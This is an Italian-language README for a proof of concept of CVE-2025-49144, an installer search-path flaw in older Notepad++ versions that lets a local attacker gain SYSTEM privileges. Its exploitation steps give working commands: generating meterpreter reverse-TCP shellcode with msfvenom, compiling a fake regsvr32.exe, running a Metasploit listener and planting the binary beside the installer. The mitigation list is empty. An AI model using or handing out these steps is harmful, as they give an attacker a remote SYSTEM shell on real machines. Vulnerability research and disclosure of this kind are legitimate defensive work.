
CVE-2025-49144 * Notepad++ v8.8.1 * POC a livello SYSTEM
CVE-2025-49144 * Notepad++ v8.8.1 * POC a livello SYSTEM

📌 CVE-2025-49144 è una vulnerabilità di escalation dei privilegi locali di alta gravità trovata negli installer di Notepad++ v8.8.1 e versioni precedenti. Questa vulnerabilità deriva da un comportamento incontrollato del percorso di ricerca degli eseguibili durante l'installazione, consentendo a un attaccante locale di ottenere privilegi a livello SYSTEM posizionando eseguibili malevoli nella stessa directory dell'installer.
⚙️ Come funziona la CVE – Passo dopo passo:
🧱 1. Cosa è andato storto nell'installer?
L'installer di Notepad++ (prima della v8.8.2) chiama regsvr32.exe per registrare alcuni componenti — ma lo fa senza specificare il percorso completo (come C:\Windows\System32\regsvr32.exe).
Invece, esegue semplicemente:
regsvr32.exe some_dll
📂 2. Comportamento del percorso di ricerca di Windows: Quando un eseguibile viene avviato senza un percorso completo, Windows utilizza un ordine di ricerca specifico per trovare il file:
Quindi, se un regsvr32.exe falso viene posizionato nella stessa cartella dell'installer (es. Download), Windows lo userà prima di quello reale.
💣 3. Sfruttamento:
⚙️ Passi per riprodurre:
Get shell code: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c > shellcode.txt Scarica il file "regsvr32_loader.c" e modificalo. Incolla l'intero shellcode da shellcode.txt nel commento menzionato. Compila in regsvr32.exe: x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows Distribuisci un listener meterpreter: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.9 set LPORT 4444 run Scarica una versione vulnerabile di Notepad++ cioè precedente alla 8.8.1 poiché la 8.8.1 ora viene aggiornata automaticamente. Per il PoC ho usato Notepad++ v8.6.8 Sposta il file "regsvr32.exe" nel sistema Windows nella stessa cartella dell'installer di Notepad++, probabilmente nella cartella Download. Completa l'installazione dell'installer di Notepad++. Nota: Questo è un PoC quindi testato con Windows Defender e protezione in tempo reale disabilitata.
✅ Mitigazione
Gli utenti e gli amministratori dovrebbero:
🏷️ Licenza Licenza MIT — Gratuita solo per scopi educativi, di ricerca e difensivi.
🤝 Contributi Pull Requests benvenuti — migliorare il rilevamento, aggiungere funzionalità o suggerire correzioni.